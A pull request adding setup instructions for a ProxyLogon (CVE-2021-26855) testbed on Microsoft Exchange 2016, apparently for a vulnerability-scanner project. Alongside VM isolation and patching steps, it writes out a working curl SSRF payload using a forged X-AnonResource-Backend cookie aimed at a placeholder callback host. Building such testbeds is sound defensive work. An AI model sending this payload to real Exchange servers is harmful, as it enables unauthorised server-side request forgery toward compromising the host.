### PR TITLE
Microsoft Exchange ProxyLogon CVE-2021-26855 Testbed

### DIFF
--- a/microsoft/exchange/CVE-2021-26855/README.md
+++ b/microsoft/exchange/CVE-2021-26855/README.md
@@ -1,0 +1,39 @@
+Since Microsoft Exchange is commercial software that requires a license to operate, and only runs on Windows Servers, Docker can't be used. the following instructions can be used.
+
+# Vulnerable instance
+1. Install Windows Server 2016 Datacenter in a virtual machine (Azure allows doing this quickly. You may need to select the Windows Server 2016 Datacenter version). **IMPORTANT**: While creating the virtual machine, select options to block all inbound traffic, then later select options to create a Network Security Group to allow traffic from only your own IP address to prevent exploitation. Remember to keep the exchange server isolated from any other services.
+2. After starting the VM, connect with RDP. You can use the "Windows App" if using a MacOS.
+3. Configure the server to use Active Directory. This requires using the Server Manager to add the Active Directory Domain Services role. After installing that, promote the server to a Domain Controller by clicking the flag in the top right of the Server Manager. You should choose options to create a new forest and to install DNS.
+4. Install all Exchange Server 2016 prerequisites. Install them for the Exchange Server and the Mailbox role from this link: https://learn.microsoft.com/en-us/exchange/plan-and-deploy/prerequisites-2016 .
+5. Install the Exchange Server 2016 Cumulative Update 17 from https://www.microsoft.com/en-us/download/details.aspx?id=101448 . When installing, choose the Mailbox role. 
+6. Confirm that the vulnerability is exploitable. Use the following curl command, replacing {VULNERABLE_HOST} with your vulnerable instance IP address, and replacing {CALLBACK_HOST} with a callback host that listens on HTTPS: TODO
+```
+curl -k -i https://{VULNERABLE_HOST}/owa/auth/x.js \
+  -H 'Cookie: X-AnonResource=true; X-AnonResource-Backend=tsunami]@{CALLBACK_HOST}/#~1'
+```
+The response will be the HTTPS response from your callback server.
+
+# Patched Instance
+7. Clone the vulnerable VM. In Azure, this means stopping the server, creating a snapshot of the disk, creating a new disk from that snapshot, and creating a new VM from that snapshot. Keep the new VM isolated once again to prevent exploitation.
+8. Apply the security patch "Security Update For Exchange Server 2016 CU17 (KB5000871)" from https://www.microsoft.com/en-us/download/details.aspx?id=102885 . 
+9. Test the patched version with the same curl command. The response this time should be an error with no callback server interaction.
+```
+HTTP/2 302 
+cache-control: private
+content-type: text/html; charset=utf-8
+location: /owa/auth/errorFE.aspx?httpCode=500
+server: Microsoft-IIS/10.0
+request-id: 95f0a0fa-52b6-4da2-8fae-205087a6699f
+x-aspnet-version: 4.0.30319
+x-powered-by: ASP.NET
+date: Thu, 05 Feb 2026 06:34:27 GMT
+content-length: 152
+
+<html><head><title>Object moved</title></head><body>
+<h2>Object moved to <a href="/owa/auth/errorFE.aspx?httpCode=500">here</a>.</h2>
+</body></html>
+```
+
+# Alternative POC
+
+As an alternative to test the vulnerability without a callback, you can also use Microsoft's Nmap script from https://github.com/microsoft/CSS-Exchange/blob/296dc3b6c50bc22be97a762d176ec028e2c63adb/Security/src/http-vuln-cve2021-26855.nse . 


### PR DESCRIPTION
This contains instructions to set up a testbed for CVE-2021-26855. It requires Microsoft Exchange on a Windows Server, so it can't use Docker.